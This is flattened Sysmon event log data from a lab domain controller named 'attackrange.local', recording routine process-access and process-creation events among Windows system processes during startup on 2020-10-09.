10:39:53.542{733EE690-3DF9-5F80-0C00-000000007F01}5881036C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.542{733EE690-3DF9-5F80-0C00-000000007F01}5881036C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.542{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0800-000000007F01}724C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.542{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0500-000000007F01}644C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0800-000000007F01}724C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0500-000000007F01}644C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF9-5F80-0C00-000000007F01}5881008C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.526{733EE690-3DF6-5F80-0200-000000007F01}448460C:\Windows\System32\smss.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.479{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46888|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.479{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.479{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0A00-000000007F01}852948C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.464{733EE690-3DF7-5F80-0A00-000000007F01}852856C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19bbb|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.448{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.432{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.432{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.417{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.323{733EE690-3DF7-5F80-0A00-000000007F01}852948C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.323{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.323{733EE690-3DF7-5F80-0A00-000000007F01}852856C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19e30|C:\Windows\system32\services.exe+19b29|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.323{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.307{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 